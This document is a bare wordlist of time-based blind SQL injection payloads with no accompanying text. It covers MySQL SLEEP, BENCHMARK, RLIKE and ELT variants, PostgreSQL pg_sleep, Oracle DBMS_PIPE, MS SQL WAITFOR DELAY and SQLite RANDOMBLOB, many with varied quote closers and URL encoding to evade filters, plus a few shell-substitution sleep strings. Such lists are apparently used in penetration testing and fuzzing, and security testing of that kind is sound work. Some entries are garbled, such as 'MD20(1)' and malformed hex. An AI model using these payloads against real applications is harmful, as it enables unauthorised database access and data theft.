XOR(if(now()=sysdate(),sleep(10),0))XOR
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(10*1),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'X
0"XOR(if(now()=sysdate(),sleep(10),0))XOR"Z
if(now()=sysdate(),sleep(10),0)
'XOR(if(now()=sysdate(),sleep(10),0))XOR'
'XOR(if(now()=sysdate(),sleep(10*1),0))OR'
'XOR(if((select now()=sysdate()),sleep(10),0))XOR'Z
R(if(now()=sysdate(),sleep(10),0))OR"*/
X'XOR(if(now()=sysdate(),//sleep(10)//,0))XOR'X
X'XOR(if(now()=sysdate(),(sleep((((10))))),0))XOR'X
(if(now()=sysdate(),sleep(10),0) and 5=5)"/
X'XOR(if((select now()=sysdate()),BENCHMARK(1000000,md5('xyz')),0))XOR'X
'XOR(SELECT(0)FROM(SELECT(SLEEP(10)))a)XOR'Z
if(now()=sysdate(),SLEEP(10),0)
(SELECT(0)FROM(SELECT(SLEEP(10)))a)
'XOR(if(now()=sysdate(),sleep(10*5),0))OR'
'XOR(if(now()=sysdate(),sleep(10*5*0),0))OR'
SLEEP(10)
(SELECT * FROM (SELECT(SLEEP(10)))a)
(select(0)from(select(sleep(10)))v)
(SELECT SLEEP(10))
%2c(select%5*%5from%5(select(sleep(10)))a)
'%2b(select*from(select(sleep(10)))a)%2b'
1'%2b(select*from(select(sleep(10)))a)%2b'
desc%2c(select*from(select(sleep(10)))a)
-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(10))A))
-1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(10))A))
(select*from(select(sleep(10)))a)
,(select * from (select(sleep(10)))a)
(SELECT * FROM (SELECT(SLEEP(10)))YYYY)
(SELECT * FROM (SELECT(SLEEP(10)))YYYY)#
(SELECT * FROM (SELECT(SLEEP(10)))YYYY)--
'+(select*from(select(sleep(10)))a)+'
(select(0)from(select(sleep(10)))v)%2f'+
(select(0)from(select(sleep(10)))v)+'"
(select(0)from(select(sleep(10)))v)%2f*'+
(select(0)from(select(sleep(10)))v)+'"+
(select(0)from(select(sleep(10)))v)+"*%2f
(select(0)from(select(sleep(10)))v)/*'+
(select(0)from(select(sleep(10)))v)+"*/
',''),/*test*/%26%26%09sLeEp(10)%09--+
CASE//WHEN(LENGTH(version())=5)THEN(SLEEP(10*1))END
');(SELECT 4564 FROM PG_SLEEP(10))--
["')//OR//MID(0x352e362e33332d6c6f67,1,1)//LIKE//5//%23"]
DBMS_PIPE.RECEIVE_MESSAGE(%5BINT%5D,5)%20AND%20%27bar%27=%27bar
AND 5851=DBMS_PIPE.RECEIVE_MESSAGE([INT],5) AND 'bar'='bar
1' AND (SELECT 6268 FROM (SELECT(SLEEP(10)))ghXo) AND 'IKlK'='IKlK
*'XOR(if(2=2,sleep(10),0))OR'
-1' or 1=IF(LENGTH(ASCII((SELECT USER())))&gt;5, 1, 0)--//
'+(select*from(select(if(1=1,sleep(10),false)))a)+'"
2021 AND (SELECT 6868 FROM (SELECT(SLEEP(10)))IiOE)
BENCHMARK(10000000,MD5(CHAR(116)))
'%2bbenchmark(10000000%2csha1(1))%2b'
'%20and%20(select%20%20from%20(select(if(substring(user(),1,1)='p',sleep(10),1)))a)--%20 - true
if(now()=sysdate(),sleep(10),0)/"XOR(if(now()=sysdate(),sleep(10),0))OR"/
if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XO
if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR
if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"/
if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0) and 1=1)"/
%22)%20AND%201337%3dBENCHMARK(5000000,MD5(0x774c5341))%20AND%20(%221337%22%20LIKE%20%221337
'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
"XOR(if(now()=sysdate(),sleep(10),0))XOR"Z
X'XOR(if(now()=sysdate(),(sleep(10)),0))XOR'X
X'XOR(if((select now()=sysdate()),BENCHMARK(10000000,md5('xyz')),0))XOR'X
'XOR(if(now()=sysdate(),sleep(10),0))OR'
1 AND (SELECT(0)FROM(SELECT(SLEEP(10)))a)-- wXyW
CASE//WHEN(LENGTH(version())=10)THEN(SLEEP(10))END
DBMS_PIPE.RECEIVE_MESSAGE([INT],10) AND 'bar'='bar
AND 5851=DBMS_PIPE.RECEIVE_MESSAGE([INT],10) AND 'bar'='bar
-1' or 1=IF(LENGTH(ASCII((SELECT USER())))&gt;13, 1, 0)--//
'+(select*from(select(if(1=1,sleep(10),false)))a)+'
'%2bbenchmark(10000000,sha1(1))%2b'
0'|(IF((now())LIKE(sysdate()),SLEEP(10),0))|'Z
1 and sleep 20--
1 and sleep 20
1 and sleep(20)--
1 and sleep(20)
' and sleep 20--
' and sleep 20
' and sleep 20 and '1'='1
' and sleep(20) and '1'='1
' and sleep(20)--
' and sleep(20)
' AnD SLEEP(20) ANd '1
and sleep 20--
and sleep 20
and sleep(20)--
and sleep(20)
and SELECT SLEEP(20); #
AnD SLEEP(20)
AnD SLEEP(20)--
AnD SLEEP(20)#
' AND SLEEP(20)#
" AND SLEEP(20)#
') AND SLEEP(20)#
sleep(20)#
1 or sleep(20)#
" or sleep(20)#
' or sleep(20)#
" or sleep(20)="
' or sleep(20)='
1) or sleep(20)#
") or sleep(20)="
') or sleep(20)='
1)) or sleep(20)#
")) or sleep(20)="
')) or sleep(20)='
or sleep 20--
or sleep 20
or sleep(20)--
or sleep(20)
or SELECT SLEEP(20); #
or SLEEP(20)
or SLEEP(20)#
or SLEEP(20)--
or SLEEP(20)="
or SLEEP(20)='
' OR SLEEP(20)#
" OR SLEEP(20)#
') OR SLEEP(20)#
')) or sleep(20)='
" or sleep(20)#
1) or sleep(20)#
)) or sleep(20)='
1)) or sleep(20)#
or sleep(20)#
%20'sleep%20200'
%20$(sleep%20200)
")) or sleep(20)="
or sleep(20)='
") or sleep(20)="
) or sleep(20)='
1 or sleep(20)#
";SELECT pg_sleep(20);
;SELECT pg_sleep(20);
and SELECT pg_sleep(20);
1 SELECT pg_sleep(20);
or SELECT pg_sleep(20);
(SELECT pg_sleep(20))
pg_sleep(20)--
1 or pg_sleep(20)--
" or pg_sleep(20)--
' or pg_sleep(20)--
1) or pg_sleep(20)--
") or pg_sleep(20)--
') or pg_sleep(20)--
1)) or pg_sleep(20)--
")) or pg_sleep(20)--
')) or pg_sleep(20)--
pg_SLEEP(20)
pg_SLEEP(20)--
pg_SLEEP(20)#
or pg_SLEEP(20)
or pg_SLEEP(20)--
or pg_SLEEP(20)#
' SELECT pg_sleep(20);
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(20))
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(20))-- 1337
1' AND 1337=(SELECT 1337 FROM PG_SLEEP(20)) AND '1337'='1337
1') AND 1337=(SELECT 1337 FROM PG_SLEEP(20)) AND ('1337'='1337
1) AND 1337=(SELECT 1337 FROM PG_SLEEP(20)) AND (1337=1337
or pg_sleep(20)--
) or pg_sleep(20)--
)) or pg_sleep(20)--
1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),20)
1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),20)-- 1337
' AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),20) AND '1337'='1337
') AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),20) AND ('1337'='1337
) AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),20) AND (1337=1337
;waitfor delay '0:0:20'--
';WAITFOR DELAY '0:0:20'--
);waitfor delay '0:0:20'--
';waitfor delay '0:0:20'--
";waitfor delay '0:0:20'--
');waitfor delay '0:0:20'--
");waitfor delay '0:0:20'--
));waitfor delay '0:0:20'--
'));waitfor delay '0:0:20'--
"));waitfor delay '0:0:20'--
") IF (1=1) WAITFOR DELAY '0:0:20'--
';%20waitfor%20delay%20'0:0:20'%20--%20
' WAITFOR DELAY '0:0:20'--
' WAITFOR DELAY '0:0:20'
or WAITFOR DELAY '0:0:20'--
or WAITFOR DELAY '0:0:20'
and WAITFOR DELAY '0:0:20'--
and WAITFOR DELAY '0:0:20'
WAITFOR DELAY '0:0:20'
;WAITFOR DELAY '0:0:20'--
;WAITFOR DELAY '0:0:20'
1 WAITFOR DELAY '0:0:20'--
1 WAITFOR DELAY '0:0:20'
1 WAITFOR DELAY '0:0:20'-- 1337
1' WAITFOR DELAY '0:0:20' AND '1337'='1337
1') WAITFOR DELAY '0:0:20' AND ('1337'='1337
1) WAITFOR DELAY '0:0:20' AND (1337=1337
') WAITFOR DELAY '0:0:20'--
" WAITFOR DELAY '0:0:20'--
')) WAITFOR DELAY '0:0:20'--
'))) WAITFOR DELAY '0:0:20'--
%' WAITFOR DELAY '0:0:20'--
") WAITFOR DELAY '0:0:20'--
")) WAITFOR DELAY '0:0:20'--
"))) WAITFOR DELAY '0:0:20'--
1 waitfor delay '0:0:20'--
1' waitfor delay '0:0:20'--
benchmark(10000000,MD20(1))#
1 or benchmark(10000000,MD20(1))#
" or benchmark(10000000,MD20(1))#
' or benchmark(10000000,MD20(1))#
1) or benchmark(10000000,MD20(1))#
") or benchmark(10000000,MD20(1))#
') or benchmark(10000000,MD20(1))#
1)) or benchmark(10000000,MD20(1))#
")) or benchmark(10000000,MD20(1))#
')) or benchmark(10000000,MD20(1))#
pg_sleep(20)--
1 or pg_sleep(20)--
" or pg_sleep(20)--
' or pg_sleep(20)--
1) or pg_sleep(20)--
") or pg_sleep(20)--
') or pg_sleep(20)--
1)) or pg_sleep(20)--
")) or pg_sleep(20)--
')) or pg_sleep(20)--
AND (SELECT * FROM (SELECT(SLEEP(20)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(20)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(20)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(20)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(20)))nQIP)#
SLEEP(20)#
SLEEP(20)--
SLEEP(20)="
SLEEP(20)='
or SLEEP(20)
or SLEEP(20)#
or SLEEP(20)--
or SLEEP(20)="
or SLEEP(20)='
waitfor delay '00:00:020'
waitfor delay '00:00:020'--
waitfor delay '00:00:020'#
benchmark(200000000,MD20(1))
benchmark(200000000,MD20(1))--
benchmark(200000000,MD20(1))#
or benchmark(200000000,MD20(1))
or benchmark(200000000,MD20(1))--
or benchmark(200000000,MD20(1))#
pg_SLEEP(20)
pg_SLEEP(20)--
pg_SLEEP(20)#
or pg_SLEEP(20)
or pg_SLEEP(20)--
or pg_SLEEP(20)#
'\"
AnD SLEEP(20)
AnD SLEEP(20)--
AnD SLEEP(20)#
&&SLEEP(20)
&&SLEEP(20)--
&&SLEEP(20)#
' AnD SLEEP(20) ANd '1
'&&SLEEP(20)&&'1
ORDER BY SLEEP(20)
ORDER BY SLEEP(20)--
ORDER BY SLEEP(20)#
(SELECT * FROM (SELECT(SLEEP(20)))ecMj)
(SELECT * FROM (SELECT(SLEEP(20)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(20)))ecMj)--
+benchmark(3200,SHA1(1))+'
+ SLEEP(10) + '
RANDOMBLOB(2000000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(2000000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(2000000000/2))))
RANDOMBLOB(1000000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
1 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)
1 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND (1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND '1337'='1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ('PBiy'='PBiy
) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND (1337=1337
)) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ((1337=1337
))) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND (((1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)# 1337
) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
1 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
+(SELECT 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY))+
)) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
` WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
`) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
`=`1` AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY))|[1
') AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ('1337'='1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND (('1337'='1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ((('1337'='1337
' AND (SELECT 3122 FROM (SELECT(SLEEP(20)))YYYY) AND '1337'='1337
') AND (SELECT 4796 FROM (SELECT(SLEEP(20)))YYYY) AND ('1337'='1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND (('1337' LIKE '1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ((('1337' LIKE '1337
%' AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND '1337%'='1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND '1337' LIKE '1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ("1337"="1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND (("1337"="1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ((("1337"="1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND "1337"="1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ("1337" LIKE "1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND (("1337" LIKE "1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ((("1337" LIKE "1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND "1337" LIKE "1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) OR '1337'='1337
') WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
") WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
RLIKE SLEEP(20)--
' RLIKE SLEEP(20)--
' RLIKE SLEEP(20)-- 1337
" RLIKE SLEEP(20)-- 1337
') RLIKE SLEEP(20)-- 1337
') RLIKE SLEEP(20) AND ('1337'='1337
')) RLIKE SLEEP(20) AND (('1337'='1337
'))) RLIKE SLEEP(20) AND ((('1337'='1337
) RLIKE SLEEP(20)-- 1337
) RLIKE SLEEP(20) AND (1337=1337
)) RLIKE SLEEP(20) AND ((1337=1337
))) RLIKE SLEEP(20) AND (((1337=1337
1 RLIKE SLEEP(20)
1 RLIKE SLEEP(20)-- 1337
1 RLIKE SLEEP(20)# 1337
) WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
1 WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
+(SELECT 1337 WHERE 1337=1337 RLIKE SLEEP(20))+
)) AS 1337 WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
) AS 1337 WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
` WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
`) WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
' RLIKE SLEEP(20) AND '1337'='1337
') RLIKE SLEEP(20) AND ('1337' LIKE '1337
')) RLIKE SLEEP(20) AND (('1337' LIKE '1337
'))) RLIKE SLEEP(20) AND ((('1337' LIKE '1337
%' RLIKE SLEEP(20) AND '1337%'='1337
' RLIKE SLEEP(20) AND '1337' LIKE '1337
") RLIKE SLEEP(20) AND ("1337"="1337
")) RLIKE SLEEP(20) AND (("1337"="1337
"))) RLIKE SLEEP(20) AND ((("1337"="1337
" RLIKE SLEEP(20) AND "1337"="1337
") RLIKE SLEEP(20) AND ("1337" LIKE "1337
")) RLIKE SLEEP(20) AND (("1337" LIKE "1337
"))) RLIKE SLEEP(20) AND ((("1337" LIKE "1337
" RLIKE SLEEP(20) AND "1337" LIKE "1337
' RLIKE SLEEP(20) OR '1337'='1337
') WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
") WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
' WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
" WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
' AND ELT(1337=1337,SLEEP(20))--
' AND ELT(1337=1337,SLEEP(20))-- 1337
" AND ELT(1337=1337,SLEEP(20))-- 1337
') AND ELT(1337=1337,SLEEP(20))-- 1337
') AND ELT(1337=1337,SLEEP(20)) AND ('1337'='1337
')) AND ELT(1337=1337,SLEEP(20)) AND (('1337'='1337
'))) AND ELT(1337=1337,SLEEP(20)) AND ((('1337'='1337
' AND ELT(1337=1337,SLEEP(20)) AND '1337'='1337
') AND ELT(1337=1337,SLEEP(20)) AND ('1337' LIKE '1337
')) AND ELT(1337=1337,SLEEP(20)) AND (('1337' LIKE '1337
'))) AND ELT(1337=1337,SLEEP(20)) AND ((('1337' LIKE '1337
) AND ELT(1337=1337,SLEEP(20))-- 1337
) AND ELT(1337=1337,SLEEP(20)) AND (1337=1337
)) AND ELT(1337=1337,SLEEP(20)) AND ((1337=1337
))) AND ELT(1337=1337,SLEEP(20)) AND (((1337=1337
1 AND ELT(1337=1337,SLEEP(20))
1 AND ELT(1337=1337,SLEEP(20))-- 1337
1 AND ELT(1337=1337,SLEEP(20))# 1337
) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
1 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
+(SELECT 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))+
)) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
` WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
`) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
1`=`1` AND ELT(1337=1337,SLEEP(20)) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))|[1
%' AND ELT(1337=1337,SLEEP(20)) AND '1337%'='1337
' AND ELT(1337=1337,SLEEP(20)) AND '1337' LIKE '1337
") AND ELT(1337=1337,SLEEP(20)) AND ("1337"="1337
")) AND ELT(1337=1337,SLEEP(20)) AND (("1337"="1337
"))) AND ELT(1337=1337,SLEEP(20)) AND ((("1337"="1337
" AND ELT(1337=1337,SLEEP(20)) AND "1337"="1337
") AND ELT(1337=1337,SLEEP(20)) AND ("1337" LIKE "1337
")) AND ELT(1337=1337,SLEEP(20)) AND (("1337" LIKE "1337
"))) AND ELT(1337=1337,SLEEP(20)) AND ((("1337" LIKE "1337
" AND ELT(1337=1337,SLEEP(20)) AND "1337" LIKE "1337
' AND ELT(1337=1337,SLEEP(20)) OR '1337'='FMTE
') WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
") WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
' WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
" WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
'||(SELECT 0x4c4204f67 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))||'
'||(SELECT 0x727a20277 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))||'
'+(SELECT 0x4b6b486c WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))+'
||(SELECT 0x20720206971 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))||
||(SELECT 0x67664847 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))||
+(SELECT 0x74764164 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))+
')) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
")) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
') AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
") AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
